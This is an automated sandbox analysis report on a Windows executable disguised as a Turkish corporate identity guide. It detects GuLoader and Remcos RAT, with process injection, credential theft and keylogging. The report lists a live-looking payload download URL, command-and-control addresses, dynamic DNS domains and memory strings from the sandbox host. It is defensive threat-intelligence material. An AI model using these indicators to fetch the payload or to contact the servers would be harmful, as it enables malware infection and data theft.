Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHRI_kurumsal kimlik rehberi-2023.exe

Overview

General Information

Sample Name:DHRI_kurumsal kimlik rehberi-2023.exe
Analysis ID:1334254
MD5:f6cbf303899397b7d28e19930d48627d
SHA1:c3b2d0902bc0724228519030d341294db265f379
SHA256:2eb8015d95b1f69eca4acc3d64c0ed58125431a19df865a493990025ebe5b40a
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • DHRI_kurumsal kimlik rehberi-2023.exe (PID: 4520 cmdline: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe MD5: F6CBF303899397B7D28E19930D48627D)
    • wab.exe (PID: 7060 cmdline: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 7700 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 2268 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 4072 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6412 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\paqlgkfs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.35514010061.0000000000821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.35514571711.000000000565D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: DHRI_kurumsal kimlik rehberi-2023.exe PID: 4520JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.11.2094.156.6.2535009424022032776 10/30/23-14:17:52.394655
              SID:2032776
              Source Port:50094
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.11.20217.147.225.6950093802855192 10/30/23-14:17:49.596833
              SID:2855192
              Source Port:50093
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:94.156.6.253192.168.11.202402500942032777 10/30/23-14:20:09.593886
              SID:2032777
              Source Port:2402
              Destination Port:50094
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: DHRI_kurumsal kimlik rehberi-2023.exeReversingLabs: Detection: 78%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Antivirus / Scanner detection for submitted sample
              Source: DHRI_kurumsal kimlik rehberi-2023.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://gudanidevelopment.ge/IogvoayYhe139.binAvira URL Cloud: Label: malware
              Source: http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.binAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeAvira: detection malicious, Label: HEUR/AGEN.1338455
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exeReversingLabs: Detection: 78%
              Source: DHRI_kurumsal kimlik rehberi-2023.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: DHRI_kurumsal kimlik rehberi-2023.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_374D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D6580 FindFirstFileExA,7_2_374D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50093 -> 217.147.225.69:80
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50094 -> 94.156.6.253:2402
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50094
              Uses dynamic DNS services
              Source: unknownDNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox ViewASN Name: GRENA-ASTbilisiGeorgiaGE GRENA-ASTbilisiGeorgiaGE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 94.156.6.253 94.156.6.253
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficTCP traffic: 192.168.11.20:50094 -> 94.156.6.253:2402
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 0000000A.00000003.35576455750.0000000004680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 0000000A.00000003.35576455750.0000000004680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.35582331725.0000000004674000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.0000000004674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.35582331725.0000000004674000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.0000000004674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000003.35578024594.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35577386772.0000000004D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookma equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000003.35576669849.0000000004677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: u"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profileANg3Zw2QouYXcOw3P8MgEYmqBohsyHX3A0QYKqCpqgaYKnCaImmJqgaoKr2eaJ8Qu6JvhC8IXgC8EXskfsUsie4Rd8IfhC8IXgC8EXgi8EXwi+EHxhm5eAX/CF4Gudt8rtxcmWHtzKEYrlqfPwGMw8n+fDLltVh7rgekAiRnsBdgY/P4Itiocfnljxe+W2ga1bwbr1j/CS/34+f3++b1IqgQeX2IdvZPSDce7EDIYgeJVNpXPeTKuHZ5yVD9wJ0DceUugUaQm3qtju0YTnB5MKDsADH+gwWG2vonWTUqaj9QFb2Dy/bF7sY6I1n2DJHmpa7A/qg4yb4S6NqPJ9AtKm/5KR8b3rp9+LtsdJcYYVbLtPZTteneEulyXk/54QMpAYEW3NtmiWweguM1wR+XqhTdqDDDBykftettEI9cW4grTMwqcc equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000003.35576603084.0000000004686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profile{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20","background_apps":false,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_last_name":"Shapira","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_force_signout_state":0,"edge_kids_mode":false,"edge_muid":"243215E5327669D43677068133B66811","edge_previously_signin_user_name":"","edge_signed_in_default_name":33554433,"edge_test_on_premises":false,"edge_wam_aad_for_app_account_type":0,"edge_was_previously_signin":false,"force_signin_profile_locked":false,"gaia_given_name":"","gaia_id
              Source: wab.exe, 00000007.00000002.37758445453.0000000037410000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.37758445453.0000000037410000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
